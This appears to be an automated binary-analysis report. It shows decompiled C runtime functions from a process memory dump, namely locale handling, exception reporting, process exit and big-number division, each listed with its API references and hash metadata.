Opcode ID: 93e5aa8d6facaeef2a6d82a29e9f983181ac9ab3d6e55337326b0723bf390434
Instruction ID: 826cd4978e8a23808887901343d2bcc14922e24413da7a9cfab0ac1cfe251ad7
Opcode Fuzzy Hash: 93e5aa8d6facaeef2a6d82a29e9f983181ac9ab3d6e55337326b0723bf390434
Instruction Fuzzy Hash: 996195716401279FEB249F24EC82BAAB7B8EF44304FD0417BED05C6685E778D949CB58

Uniqueness

Uniqueness Score: 0.00%

Function 0042F601, Relevance: 4.7, APIs: 3, Instructions: 206COMMON

Download Yara Rule

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(?,?,?,0041B27E), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,0041B27E), ref: 00425252

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042F655
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042F69F
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0042F765

Part of subcall function 0042FA86: GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0042F81D,00000000,00000000,?), ref: 0042FAB2

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: a29c5f57f53c26599b4685761bba9fbfa9486da22bca5ed8f72a4bd68cbd52d9
Instruction ID: 826cd4978e8a23808887901343d2bcc14922e24413da7a9cfab0ac1cfe251ad7
Opcode Fuzzy Hash: a29c5f57f53c26599b4685761bba9fbfa9486da22bca5ed8f72a4bd68cbd52d9
Instruction Fuzzy Hash: 996195716401279FEB249F24EC82BAAB7B8EF44304FD0417BED05C6685E778D949CB58

Uniqueness

Uniqueness Score: 0.00%

Function 0041A667, Relevance: 4.6, APIs: 3, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0041A667(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v0;
				signed int _v8;
				intOrPtr _v524;
				intOrPtr _v528;
				void* _v532;
				intOrPtr _v536;
				char _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				intOrPtr _v564;
				intOrPtr _v568;
				intOrPtr _v572;
				intOrPtr _v576;
				intOrPtr _v580;
				intOrPtr _v584;
				char _v724;
				intOrPtr _v792;
				intOrPtr _v800;
				char _v804;
				struct _EXCEPTION_POINTERS _v812;
				void* __edi;
				signed int _t40;
				char* _t47;
				char* _t49;
				long _t57;
				intOrPtr _t59;
				intOrPtr _t60;
				intOrPtr _t64;
				intOrPtr _t65;
				int _t66;
				intOrPtr _t68;
				signed int _t69;

				_t68 = __esi;
				_t64 = __edx;
				_t59 = __ebx;
				_t40 =  *0x44b6b4; // 0x4a5cc10f
				_t41 = _t40 ^ _t69;
				_v8 = _t40 ^ _t69;
				_push(_t65);
				if(_a4 != 0xffffffff) {
					_push(_a4);
					E0041603E(_t41);
					_pop(_t60);
				}
				E00417660(_t65,  &_v804, 0, 0x50);
				E00417660(_t65,  &_v724, 0, 0x2cc);
				_v812.ExceptionRecord =  &_v804;
				_t47 =  &_v724;
				_v812.ContextRecord = _t47;
				_v548 = _t47;
				_v552 = _t60;
				_v556 = _t64;
				_v560 = _t59;
				_v564 = _t68;
				_v568 = _t65;
				_v524 = ss;
				_v536 = cs;
				_v572 = ds;
				_v576 = es;
				_v580 = fs;
				_v584 = gs;
				asm("pushfd");
				_pop( *_t22);
				_v540 = _v0;
				_t49 =  &_v0;
				_v528 = _t49;
				_v724 = 0x10001;
				_v544 =  *((intOrPtr*)(_t49 - 4));
				_v804 = _a8;
				_v800 = _a12;
				_v792 = _v0;
				_t66 = IsDebuggerPresent();
				SetUnhandledExceptionFilter(0);
				_t57 = UnhandledExceptionFilter( &_v812);
				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
					_push(_a4);
					_t57 = E0041603E(_t57);
				}
				E00415A87();
				return _t57;
			}

0x0041a667
0x0041a667
0x0041a667
0x0041a672
0x0041a677
0x0041a679
0x0041a680
0x0041a681
0x0041a683
0x0041a686
0x0041a68b
0x0041a68b
0x0041a697
0x0041a6aa
0x0041a6b8
0x0041a6be
0x0041a6c4
0x0041a6ca
0x0041a6d0
0x0041a6d6
0x0041a6dc
0x0041a6e2
0x0041a6e8
0x0041a6ee
0x0041a6f5
0x0041a6fc
0x0041a703
0x0041a70a
0x0041a711
0x0041a718
0x0041a719
0x0041a722
0x0041a728
0x0041a72b
0x0041a731
0x0041a73e
0x0041a747
0x0041a750
0x0041a759
0x0041a767
0x0041a769
0x0041a776
0x0041a77e
0x0041a78a
0x0041a78d
0x0041a792
0x0041a799
0x0041a7a1

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,0041370C), ref: 0041A75F
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041A769
UnhandledExceptionFilter.KERNEL32(?), ref: 0041A776

Part of subcall function 00415A87: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00416245
Part of subcall function 00415A87: ___raise_securityfailure.LIBCMT ref: 0041632C

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor___raise_securityfailure
String ID:
API String ID: 1573977735-0
Opcode ID: e9a1fc19ca26bf6f70dfce7dda1a006d303cb053a12853b436f314e2d24a6ea0
Instruction ID: 79eab87f3c302c80c0905b30eb45c6bb88a78fef50636a8f9ea6764e29117393
Opcode Fuzzy Hash: e9a1fc19ca26bf6f70dfce7dda1a006d303cb053a12853b436f314e2d24a6ea0
Instruction Fuzzy Hash: 8631D57590122C9BCB21DF68D988BCDBBB8AF08310F5042EAE41CA7251E7749F918F49

Uniqueness

Uniqueness Score: 0.03%

Function 004226CA, Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004226CA(int _a4) {
				void* _t14;

				if(E0042C592(_t14) != 1 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
					TerminateProcess(GetCurrentProcess(), _a4);
				}
				E0042274F(_t14, _a4);
				ExitProcess(_a4);
			}

0x004226d7
0x004226f3
0x004226f3
0x004226fc
0x00422705

APIs

GetCurrentProcess.KERNEL32(?,?,004226C9,?,?,?,?,?,00413761), ref: 004226EC
TerminateProcess.KERNEL32(00000000,?,004226C9,?,?,?,?,?,00413761), ref: 004226F3

Part of subcall function 0042274F: GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00422701,?,?,004226C9,?,?,?), ref: 00422764
Part of subcall function 0042274F: GetProcAddress.KERNEL32(00000000,CorExitProcess,00000000,?,?,00422701,?,?,004226C9,?,?,?), ref: 00422777
Part of subcall function 0042274F: FreeLibrary.KERNEL32(00000000,?,?,00422701,?,?,004226C9,?,?,?), ref: 0042279A

ExitProcess.KERNEL32 ref: 00422705

Memory Dump Source

Source File: 00000005.00000001.1669075870.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.1668983266.00400000.00000002.sdmp Download File
Associated: 00000005.00000001.1670705928.00437000.00000002.sdmp Download File
Associated: 00000005.00000001.1670872174.0044A000.00000008.sdmp Download File
Associated: 00000005.00000001.1670885737.0044B000.00000004.sdmp Download File
Associated: 00000005.00000001.1670906384.00450000.00000008.sdmp Download File
Associated: 00000005.00000001.1670915612.00451000.00000002.sdmp Download File

Similarity

API ID: Process$AddressCurrentExitFreeHandleLibraryModuleProcTerminate
String ID:
API String ID: 3650431659-0
Opcode ID: 622e8d5eccbd8dcfba3e72b8ddd63f8aa2229bffc9cbeb94d92d7fee4632fa31
Instruction ID: 50ea5582f01cd8bbc9e80e853a81be9fa8179c6699640f84a7129647dd0bed27
Opcode Fuzzy Hash: 622e8d5eccbd8dcfba3e72b8ddd63f8aa2229bffc9cbeb94d92d7fee4632fa31
Instruction Fuzzy Hash: C6E08C72104518BFCF212F55EE4DA4D3B38FB40781F404426F9068A232CBB9EC82EB88

Uniqueness

Uniqueness Score: 0.05%

Function 004226CA, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,004226C9,?,?,?,?), ref: 004226EC
TerminateProcess.KERNEL32(00000000,?,004226C9,?,?,?,?), ref: 004226F3

Part of subcall function 0042274F: GetModuleHandleExW.KERNEL32(00000000,0043D86C,00000000,?,?,00422701,?,?,004226C9,?,?,?), ref: 00422764
Part of subcall function 0042274F: GetProcAddress.KERNEL32(00000000,0043D884,00000000,?,?,00422701,?,?,004226C9,?,?,?), ref: 00422777
Part of subcall function 0042274F: FreeLibrary.KERNEL32(00000000,?,?,00422701,?,?,004226C9,?,?,?), ref: 0042279A

ExitProcess.KERNEL32 ref: 00422705

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: Process$AddressCurrentExitFreeHandleLibraryModuleProcTerminate
String ID:
API String ID: 3650431659-0
Opcode ID: 622e8d5eccbd8dcfba3e72b8ddd63f8aa2229bffc9cbeb94d92d7fee4632fa31
Instruction ID: 50ea5582f01cd8bbc9e80e853a81be9fa8179c6699640f84a7129647dd0bed27
Opcode Fuzzy Hash: 622e8d5eccbd8dcfba3e72b8ddd63f8aa2229bffc9cbeb94d92d7fee4632fa31
Instruction Fuzzy Hash: C6E08C72104518BFCF212F55EE4DA4D3B38FB40781F404426F9068A232CBB9EC82EB88

Uniqueness

Uniqueness Score: 0.05%

Function 0042F4DB, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63UNIQUE

Download Yara Rule

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(?,?,?,0041B27E), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,0041B27E), ref: 00425252

EnumSystemLocalesW.KERNEL32(0042F601,00000001,00000000,?,AB,?,0042FC39,00000000,00000055,?,?), ref: 0042F54D

Strings

AB, xrefs: 0042F4E0

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorLast_free$EnumLocalesSystem
String ID: AB
API String ID: 1642076358-2508311140
Opcode ID: e0f5b94162d011266128dbd2e270c2d4f5cc82e848cfe5297047546bb8de6e76
Instruction ID: be07692734449b4a933b9b40a8835d218e688bbf4e29842885d7c61b9b18d1f9
Opcode Fuzzy Hash: e0f5b94162d011266128dbd2e270c2d4f5cc82e848cfe5297047546bb8de6e76
Instruction Fuzzy Hash: 9311363A3007015FDB189F39E89167AB7A1FB80318B94443DE94687B40D375B942C744

Uniqueness

Uniqueness Score: 100.00%

Function 0042F576, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 41UNIQUE

Download Yara Rule

APIs

Part of subcall function 004251AF: GetLastError.KERNEL32(?,?,?,0041B27E), ref: 004251B4
Part of subcall function 004251AF: _free.LIBCMT ref: 00425211
Part of subcall function 004251AF: _free.LIBCMT ref: 00425247
Part of subcall function 004251AF: SetLastError.KERNEL32(00000000,0044B834,000000FF,?,?,?,0041B27E), ref: 00425252

EnumSystemLocalesW.KERNEL32(0042F856,00000001,?,?,AB,?,0042FBFD,AB,00000055,?,?,?,?,004241EB,?,?), ref: 0042F5C0

Strings

AB, xrefs: 0042F57B

Memory Dump Source

Source File: 00000005.00000002.1855766825.0041B000.00000020.sdmp, Offset: 0041B000, based on PE: false

Similarity

API ID: ErrorLast_free$EnumLocalesSystem
String ID: AB
API String ID: 1642076358-2508311140
Opcode ID: f793ba2451c673d86ac0f385696b2a356666f566af141d7cc98e55784ce23353
Instruction ID: cd6862bdb7207a514c7430135193a8af3c8b5877534af380457c06405d0632b6
Opcode Fuzzy Hash: f793ba2451c673d86ac0f385696b2a356666f566af141d7cc98e55784ce23353
Instruction Fuzzy Hash: 7EF046363003146FDB246F35EC81A7BBBA1EF80768F85443EF9058B681D6B5AC42CB48

Uniqueness

Uniqueness Score: 100.00%

Function 00421620, Relevance: 3.5, APIs: 2, Instructions: 452
COMMONCrypto

Download Yara Rule

C-Code - Quality: 94%

			E00421620(signed int* _a4, intOrPtr* _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int* _v80;
				char _v540;
				signed int _v544;
				signed int _t190;
				signed int _t191;
				intOrPtr _t192;
				signed int _t195;
				signed int _t197;
				signed int _t199;
				signed int _t200;
				signed int _t204;
				signed int _t210;
				intOrPtr _t216;
				void* _t219;
				signed int _t221;
				signed int _t232;
				void* _t236;
				signed int _t239;
				signed int* _t244;
				signed int _t245;
				signed int* _t246;
				signed int* _t247;
				signed int _t249;
				signed int _t250;
				void* _t251;
				intOrPtr* _t252;
				signed int _t254;
				unsigned int _t255;
				signed int _t257;
				signed int* _t261;
				signed int _t262;
				signed int _t263;
				intOrPtr _t265;
				void* _t269;
				signed char _t275;
				signed int* _t278;
				signed int _t282;
				signed int* _t283;
				intOrPtr* _t290;
				signed int _t292;
				signed int _t293;
				signed int* _t296;
				signed int _t297;
				signed int _t299;
				intOrPtr* _t300;
				signed int _t304;
				signed int _t305;
				signed int _t310;
				signed int _t313;
				signed int _t314;
				signed int _t315;
				void* _t316;
				signed int _t317;
				signed int _t320;
				signed int _t324;
				signed int* _t325;
				signed int _t326;
				signed int _t327;
				signed int _t328;
				signed int _t329;
				void* _t330;
				signed int _t335;
				signed int _t342;
				signed int* _t343;

				_t244 = _a4;
				_t326 =  *_t244;
				if(_t326 == 0) {
					L75:
					__eflags = 0;
					return 0;
				} else {
					_t290 = _a8;
					_t190 =  *_t290;
					_v56 = _t190;
					if(_t190 == 0) {
						goto L75;
					} else {
						_t313 = _t190 - 1;
						_t254 = _t326 - 1;
						_v12 = _t254;
						if(_t313 != 0) {
							__eflags = _t313 - _t254;
							if(_t313 > _t254) {
								goto L75;
							} else {
								_t191 = _t254;
								_t292 = _t254 - _t313;
								__eflags = _t254 - _t292;
								if(_t254 < _t292) {
									L19:
									_t292 = _t292 + 1;
									__eflags = _t292;
								} else {
									_t278 =  &(_t244[_t254 + 1]);
									_t342 = _a8 + _t313 * 4 + 4;
									__eflags = _t342;
									while(1) {
										__eflags =  *_t342 -  *_t278;
										if(__eflags != 0) {
											break;
										}
										_t191 = _t191 - 1;
										_t342 = _t342 - 4;
										_t278 = _t278 - 4;
										__eflags = _t191 - _t292;
										if(_t191 >= _t292) {
											continue;
										} else {
											goto L19;
										}
										goto L20;
									}
									if(__eflags < 0) {
										goto L19;
									}
								}
								L20:
								__eflags = _t292;
								if(__eflags == 0) {
									goto L75;
								} else {
									_t192 = _a8;
									_t245 = _v56;
									_t327 =  *(_t192 + _t245 * 4);
									_t55 = _t245 * 4; // 0xfffef396
									_t255 =  *(_t192 + _t55 - 4);
									asm("bsr eax, esi");
									_v52 = _t327;
									_v36 = _t255;
									if(__eflags == 0) {
										_t314 = 0x20;
									} else {
										_t314 = 0x1f - _t192;
									}
									_v16 = _t314;
									_v48 = 0x20 - _t314;
									__eflags = _t314;
									if(_t314 != 0) {
										_t275 = _t314;
										_v36 = _v36 << _t275;
										_v52 = _t327 << _t275 | _t255 >> _v48;
										__eflags = _t245 - 2;
										if(_t245 > 2) {
											_t68 = _t245 * 4; // 0xe850ffff
											_t70 =  &_v36;
											 *_t70 = _v36 |  *(_a8 + _t68 - 8) >> _v48;
											__eflags =  *_t70;
										}
									}
									_t328 = 0;
									_v32 = 0;
									_t293 = _t292 + 0xffffffff;
									__eflags = _t293;
									_v28 = _t293;
									if(_t293 >= 0) {
										_t197 = _t293 + _t245;
										_t247 = _a4;
										_v60 = _t197;
										_v64 = _t247 + 4 + _t293 * 4;
										_t261 = _t247 - 4 + _t197 * 4;
										_v80 = _t261;
										do {
											__eflags = _t197 - _v12;
											if(_t197 > _v12) {
												_t198 = 0;
												__eflags = 0;
											} else {
												_t198 = _t261[2];
											}
											_t297 = _t261[1];
											_t262 =  *_t261;
											_v76 = _t198;
											_v40 = 0;
											_v8 = _t198;
											_v24 = _t262;
											__eflags = _t314;
											if(_t314 != 0) {
												_t304 = _v8;
												_t320 = _t262 >> _v48;
												_t221 = E004356D0(_t297, _v16, _t304);
												_t262 = _v16;
												_t198 = _t304;
												_t297 = _t320 | _t221;
												_t328 = _v24 << _t262;
												__eflags = _v60 - 3;
												_v8 = _t304;
												_v24 = _t328;
												if(_v60 >= 3) {
													_t262 = _v48;
													_t328 = _t328 |  *(_t247 + (_v56 + _v28) * 4 - 8) >> _t262;
													__eflags = _t328;
													_t198 = _v8;
													_v24 = _t328;
												}
											}
											_push(_t247);
											_t199 = E00435630(_t297, _t198, _v52, 0);
											_v40 = _t247;
											_t249 = _t199;
											_t329 = _t328 ^ _t328;
											_t200 = _t297;
											_v8 = _t249;
											_v20 = _t200;
											_t315 = _t262;
											_v72 = _t249;
											_v68 = _t200;
											_v40 = _t329;
											__eflags = _t200;
											if(_t200 != 0) {
												L37:
												_t250 = _t249 + 1;
												asm("adc eax, 0xffffffff");
												_t315 = _t315 + E00415BA0(_t250, _t200, _v52, 0);
												asm("adc esi, edx");
												_t249 = _t250 | 0xffffffff;
												_t200 = 0;
												__eflags = 0;
												_v40 = _t329;
												_v8 = _t249;
												_v72 = _t249;
												_v20 = 0;
												_v68 = 0;
											} else {
												__eflags = _t249 - 0xffffffff;
												if(_t249 > 0xffffffff) {
													goto L37;
												}
											}
											__eflags = _t329;
											if(__eflags <= 0) {
												if(__eflags < 0) {
													goto L42;
												} else {
													__eflags = _t315 - 0xffffffff;
													if(_t315 <= 0xffffffff) {
														while(1) {
															L42:
															_v8 = _v24;
															_t219 = E00415BA0(_v36, 0, _t249, _t200);
															__eflags = _t297 - _t315;
															if(__eflags < 0) {
																break;
															}
															if(__eflags > 0) {
																L45:
																_t200 = _v20;
																_t249 = _t249 + 0xffffffff;
																_v72 = _t249;
																asm("adc eax, 0xffffffff");
																_t315 = _t315 + _v52;
																__eflags = _t315;
																_v20 = _t200;
																asm("adc dword [ebp-0x24], 0x0");
																_v68 = _t200;
																if(_t315 == 0) {
																	__eflags = _t315 - 0xffffffff;
																	if(_t315 <= 0xffffffff) {
																		continue;
																	} else {
																	}
																}
															} else {
																__eflags = _t219 - _v8;
																if(_t219 <= _v8) {
																	break;
																} else {
																	goto L45;
																}
															}
															L49:
															_v8 = _t249;
															goto L50;
														}
														_t200 = _v20;
														goto L49;
													}
												}
											}
											L50:
											__eflags = _t200;
											if(_t200 != 0) {
												L52:
												_t263 = _v56;
												_t316 = 0;
												_t330 = 0;
												__eflags = _t263;
												if(_t263 != 0) {
													_t252 = _v64;
													_t210 = _a8 + 4;
													__eflags = _t210;
													_v40 = _t210;
													_v24 = _t263;
													do {
														_v12 =  *_t210;
														_t216 =  *_t252;
														_t269 = _t316 + _v72 * _v12;
														asm("adc esi, edx");
														_t316 = _t330;
														_t330 = 0;
														__eflags = _t216 - _t269;
														if(_t216 < _t269) {
															_t316 = _t316 + 1;
															asm("adc esi, esi");
														}
														 *_t252 = _t216 - _t269;
														_t252 = _t252 + 4;
														_t210 = _v40 + 4;
														_t153 =  &_v24;
														 *_t153 = _v24 - 1;
														__eflags =  *_t153;
														_v40 = _t210;
													} while ( *_t153 != 0);
													_t249 = _v8;
													_t263 = _v56;
												}
												__eflags = 0 - _t330;
												if(__eflags <= 0) {
													if(__eflags < 0) {
														L61:
														__eflags = _t263;
														if(_t263 != 0) {
															_t251 = 0;
															_t300 = _v64;
															_t335 = _a8 + 4;
															__eflags = _t335;
															_t317 = _t263;
															do {
																_t265 =  *_t300;
																_t161 = _t335 + 4; // 0xf8835959
																_t335 = _t161;
																_t300 = _t300 + 4;
																asm("adc eax, eax");
																 *((intOrPtr*)(_t300 - 4)) = _t265 +  *((intOrPtr*)(_t335 - 4)) + _t251;
																asm("adc eax, 0x0");
																_t251 = 0;
																_t317 = _t317 - 1;
																__eflags = _t317;
															} while (_t317 != 0);
															_t249 = _v8;
														}
														_t249 = _t249 + 0xffffffff;
														asm("adc dword [ebp-0x10], 0xffffffff");
													} else {
														__eflags = _v76 - _t316;
														if(_v76 < _t316) {
															goto L61;
														}
													}
												}
												_t204 = _v60 - 1;
												__eflags = _t204;
												_v12 = _t204;
											} else {
												__eflags = _t249;
												if(_t249 != 0) {
													goto L52;
												}
											}
											_t328 = _v32;
											_t247 = _a4;
											asm("adc esi, 0x0");
											_v64 = _v64 - 4;
											_t299 = _v28 - 1;
											_t314 = _v16;
											_t261 = _v80 - 4;
											_v32 = 0 + _t249;
											_t197 = _v60 - 1;
											_v28 = _t299;
											_v60 = _t197;
											_v80 = _t261;
											__eflags = _t299;
										} while (_t299 >= 0);
									}
									_t246 = _a4;
									_t257 = _v12 + 1;
									_t195 = _t257;
									__eflags = _t195 -  *_t246;
									if(_t195 <  *_t246) {
										_t296 =  &(( &(_t246[1]))[_t195]);
										do {
											 *_t296 = 0;
											_t296 =  &(_t296[1]);
											_t195 = _t195 + 1;
											__eflags = _t195 -  *_t246;
										} while (_t195 <  *_t246);
									}
									 *_t246 = _t257;
									__eflags = _t257;
									if(_t257 != 0) {
										while(1) {
											__eflags = _t246[_t257];
											if(_t246[_t257] != 0) {
												goto L74;
											}
											_t257 = _t257 + 0xffffffff;
											__eflags = _t257;
											 *_t246 = _t257;
											if(_t257 != 0) {
												continue;
											}
											goto L74;
										}
									}
									L74:
									return _v32;
								}
							}
						} else {
							_t7 = _t290 + 4; // 0x96850f0a
							_t305 =  *_t7;
							_v12 = _t305;
							if(_t305 != 1) {
								__eflags = _t254;
								if(_t254 != 0) {
									_t324 = 0;
									_v16 = 0;
									_v40 = 0;
									_v28 = 0;
									__eflags = _t254 - 0xffffffff;
									if(_t254 != 0xffffffff) {
										_t282 = _t254 + 1;
										__eflags = _t282;
										_t283 =  &(_t244[_t282]);
										_v32 = _t283;
										do {
											_t236 = E00435630( *_t283, _t324, _t305, 0);
											_v28 = _t244;
											_t244 = _t244;
											_v68 = _t305;
											_t324 = _t283;
											_v16 = 0 + _t236;
											_t305 = _v12;
											asm("adc ecx, 0x0");
											_v40 = _v16;
											_t283 = _v32 - 4;
											_v32 = _t283;
											_t326 = _t326 - 1;
											__eflags = _t326;
										} while (_t326 != 0);
										_t244 = _a4;
									}
									_v544 = 0;
									_t343 =  &(_t244[1]);
									 *_t244 = 0;
									E0041FD4C(_t343, 0x1cc,  &_v540, 0);
									_t232 = _v28;
									__eflags = 0 - _t232;
									 *_t343 = _t324;
									_t244[2] = _t232;
									asm("sbb ecx, ecx");
									__eflags =  ~0x00000000;
									 *_t244 = 0xbadbae;
									return _v16;
								} else {
									_t325 =  &(_t244[1]);
									_v544 = _t254;
									 *_t244 = _t254;
									E0041FD4C(_t325, 0x1cc,  &_v540, _t254);
									_t239 = _t244[1];
									_t310 = _t239 % _v12;
									__eflags = 0 - _t310;
									 *_t325 = _t310;
									asm("sbb ecx, ecx");
									__eflags = 0;
									 *_t244 =  ~0x00000000;
									return _t239 / _v12;
								}
							} else {
								_v544 = _t313;
								 *_t244 = _t313;
								E0041FD4C( &(_t244[1]), 0x1cc,  &_v540, _t313);
								return _t244[1];
							}
						}
					}
				}
			}

0x0042162c
0x00421631
0x00421635
0x00421aaf
0x00421ab1
0x00421ab7
0x0042163b
0x0042163b
0x0042163e
0x00421640
0x00421645
0x00000000
0x0042164b
0x0042164b
0x0042164e
0x00421651
0x00421656
0x00421787
0x00421789
0x00000000
0x0042178f
0x00421791
0x00421793
0x00421795
0x00421797
0x004217bd
0x004217bd
0x004217bd
0x00421799
0x004217a0
0x004217a3
0x004217a3
0x004217a6
0x004217aa
0x004217ac
0x00000000
0x00000000
0x004217ae
0x004217af
0x004217b2
0x004217b5
0x004217b7
0x00000000
0x004217b9
0x00000000
0x004217b9
0x00000000
0x004217b7
0x004217bb
0x00000000
0x00000000
0x004217bb
0x004217be
0x004217be
0x004217c0
0x00000000
0x004217c6
0x004217c6
0x004217c9
0x004217cc
0x004217cf
0x004217cf
0x004217d3
0x004217d6
0x004217d9
0x004217dc
0x004217e7
0x004217de
0x004217e3
0x004217e3
0x004217f1
0x004217f6
0x004217f9
0x004217fb
0x00421804
0x00421806
0x0042180d
0x00421810
0x00421813
0x0042181b
0x00421821
0x00421821
0x00421821
0x00421821
0x00421813
0x00421824
0x00421826
0x0042182d
0x0042182d
0x00421830
0x00421833
0x00421839
0x0042183c
0x0042183f
0x00421848
0x0042184e
0x00421851
0x00421854
0x00421854
0x00421857
0x0042185e
0x0042185e
0x00421859
0x00421859
0x00421859
0x00421860
0x00421863
0x00421865
0x00421868
0x0042186f
0x00421872
0x00421875
0x00421877
0x00421882
0x00421885
0x0042188a
0x0042188f
0x00421896
0x0042189b
0x0042189d
0x0042189f
0x004218a3
0x004218a6
0x004218a9
0x004218b1
0x004218ba
0x004218ba
0x004218bc
0x004218bf
0x004218bf
0x004218a9
0x004218c2
0x004218ca
0x004218cf
0x004218d4
0x004218d6
0x004218d8
0x004218da
0x004218dd
0x004218e0
0x004218e2
0x004218e5
0x004218e8
0x004218eb
0x004218ed
0x004218f4
0x004218f9
0x004218fc
0x00421906
0x00421908
0x0042190a
0x0042190d
0x0042190d
0x0042190f
0x00421912
0x00421915
0x00421918
0x0042191b
0x004218ef
0x004218ef
0x004218f2
0x00000000
0x00000000
0x004218f2
0x0042191e
0x00421920
0x00421922
0x00000000
0x00421924
0x00421924
0x00421927
0x00421930
0x00421930
0x0042193e
0x00421941
0x00421946
0x00421948
0x00000000
0x00000000
0x0042194a
0x00421951
0x00421951
0x00421954
0x00421957
0x0042195a
0x0042195d
0x0042195d
0x00421960
0x00421963
0x00421967
0x0042196a
0x0042196c
0x0042196f
0x00000000
0x00000000
0x00421971
0x0042196f
0x0042194c
0x0042194c
0x0042194f
0x00000000
0x00000000
0x00000000
0x00000000
0x0042194f
0x00421976
0x00421976
0x00000000
0x00421976
0x00421973
0x00000000
0x00421973
0x00421927
0x00421922
0x00421979
0x00421979
0x0042197b
0x00421985
0x00421985
0x00421988
0x0042198a
0x0042198c
0x0042198e
0x00421993
0x00421996
0x00421996
0x00421999
0x0042199c
0x004219a0
0x004219a2
0x004219b7
0x004219b9
0x004219bb
0x004219bd
0x004219bf
0x004219c1
0x004219c3
0x004219c5
0x004219c8
0x004219c8
0x004219cc
0x004219ce
0x004219d4
0x004219d7
0x004219d7
0x004219d7
0x004219db
0x004219db
0x004219e0
0x004219e3
0x004219e3
0x004219e8
0x004219ea
0x004219ec
0x004219f3
0x004219f3
0x004219f5
0x004219fa
0x004219fc
0x004219ff
0x004219ff
0x00421a02
0x00421a04
0x00421a04
0x00421a06
0x00421a06
0x00421a0b
0x00421a11
0x00421a15
0x00421a18
0x00421a1b
0x00421a1d
0x00421a1d
0x00421a1d
0x00421a22
0x00421a22
0x00421a25
0x00421a28
0x004219ee
0x004219ee
0x004219f1
0x00000000
0x00000000
0x004219f1
0x004219ec
0x00421a2f
0x00421a2f
0x00421a30
0x0042197d
0x0042197d
0x0042197f
0x00000000
0x00000000
0x0042197f
0x00421a33
0x00421a40
0x00421a43
0x00421a46
0x00421a4a
0x00421a4b
0x00421a4e
0x00421a51
0x00421a57
0x00421a58
0x00421a5b
0x00421a5e
0x00421a61
0x00421a61
0x00421854
0x00421a6c
0x00421a6f
0x00421a70
0x00421a72
0x00421a74
0x00421a79
0x00421a80
0x00421a80
0x00421a86
0x00421a89
0x00421a8a
0x00421a8a
0x00421a80
0x00421a8e
0x00421a90
0x00421a92
0x00421a94
0x00421a94
0x00421a98
0x00000000
0x00000000
0x00421a9a
0x00421a9a
0x00421a9d
0x00421a9f
0x00000000
0x00000000
0x00000000
0x00421a9f
0x00421a94
0x00421aa1
0x00421aac
0x00421aac
0x004217c0
0x0042165c
0x0042165c
0x0042165c
0x0042165f
0x00421665
0x00421696
0x00421698
0x004216da
0x004216dc
0x004216e3
0x004216ea
0x004216ed
0x004216f0
0x004216f2
0x004216f2
0x004216f3
0x004216f6
0x00421700
0x0042170a
0x0042170f
0x00421712
0x00421714
0x00421717
0x00421720
0x00421723
0x00421726
0x00421729
0x0042172f
0x00421732
0x00421735
0x00421735
0x00421735
0x0042173a
0x0042173a
0x00421745
0x00421750
0x00421753
0x0042175f
0x00421764
0x0042176f
0x00421771
0x00421773
0x00421779
0x0042177e
0x00421780
0x00421786
0x0042169a
0x004216a5
0x004216a8
0x004216b4
0x004216b6
0x004216bd
0x004216bf
0x004216c7
0x004216c9
0x004216cb
0x004216d0
0x004216d3
0x004216d9
0x004216d9
0x00421667
0x00421675
0x00421681
